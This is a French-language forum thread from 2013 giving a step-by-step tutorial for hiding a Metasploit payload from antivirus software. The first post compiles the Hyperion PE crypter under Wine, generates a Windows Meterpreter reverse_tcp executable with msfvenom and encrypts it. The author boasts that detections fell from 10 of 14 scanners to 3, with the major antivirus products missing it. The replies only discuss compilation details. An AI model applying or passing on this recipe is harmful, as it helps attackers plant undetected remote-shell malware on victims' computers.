Index du Forum

communauté marocaine des utilisateurs de backtrack
 
 Index du ForumFAQRechercherS’enregistrerConnexion
:: Endodre un Payload avec Hyperion ::

 
Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Outils, codes et astuces -> Tutos et Howto
Sujet précédent :: Sujet suivant  
Auteur Message
masef


Hors ligne

Inscrit le: 07 Fév 2013
Messages: 20
Localisation: rabat

MessagePosté le: Jeu 7 Fév - 20:05 (2013)    Sujet du message: Endodre un Payload avec Hyperion Répondre en citant

Hyperion est un Crypter PE (Portable Executable)

Nous allons ici l'utiliser sous Backtrack 5 R3 avec l'aide de wine pour encoder notre payload Metasploit et ainsi tenter de contourner la protection de certains AVs (cette méhode donne de bons résultats d'ailleurs)

Commencez par télécharger l'archive

http://packetstormsecurity.org/files/download/113060/Hyperion-1.0.zip


unzip Hyperion-1.0.zip


cd Hyperion-1.0

Et on le compile de cette façon:


Code:


wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe


Créons maintenant notre payload metasploit:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.X.X LPORT=443 -f exe >payload.exe

( Configurer LPORT et LHOST selon votre ip backtrack)

Et on encode notre payload de la facon suivante:


wine crypter.exe payload.exe encrypted_payload.exe


Perso: un payload donnant sur noVirusThank de basse a 10/14, je le rend 3/14 dont les plus gros AV sont non detecter
_________________
Ce n'est pas un gage de bonne santé , que d'être bien intégrer dans une socièté profondement malade.


Revenir en haut
Publicité






MessagePosté le: Jeu 7 Fév - 20:05 (2013)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Alien
Administrateur

Hors ligne

Inscrit le: 10 Mai 2012
Messages: 173

MessagePosté le: Ven 8 Fév - 07:36 (2013)    Sujet du message: Endodre un Payload avec Hyperion Répondre en citant

Il est vraiment obligatoire de compiler le crypter en méthode Windows alors qu'on à le code source .cpp ?

Edit: j'ai regardé les sources, il dépend de dll et exe déjà présente pour Windows.


Revenir en haut
masef


Hors ligne

Inscrit le: 07 Fév 2013
Messages: 20
Localisation: rabat

MessagePosté le: Ven 8 Fév - 12:40 (2013)    Sujet du message: Endodre un Payload avec Hyperion Répondre en citant

Oui Alien , je pense que la complilation est obligatoire.

Mais je ne suis pas sure a 100%.

Je vais me renseigner et voir si on peut faire plus.
_________________
Ce n'est pas un gage de bonne santé , que d'être bien intégrer dans une socièté profondement malade.


Revenir en haut
Alien
Administrateur

Hors ligne

Inscrit le: 10 Mai 2012
Messages: 173

MessagePosté le: Ven 8 Fév - 19:08 (2013)    Sujet du message: Endodre un Payload avec Hyperion Répondre en citant

Je sais qu'elle est obligatoire c'est pas le souci, je me demandais pourquoi avec wine et pas direct dans backtrack avec gcc linux, mais j'ai déjà ma réponse.
certaine partie des source ne sont pas compilée et dépendent de windows donc de wine.


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 20:11 (2017)    Sujet du message: Endodre un Payload avec Hyperion

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet     Index du Forum -> Outils, codes et astuces -> Tutos et Howto Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | forum gratuit | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation

© Alien 2012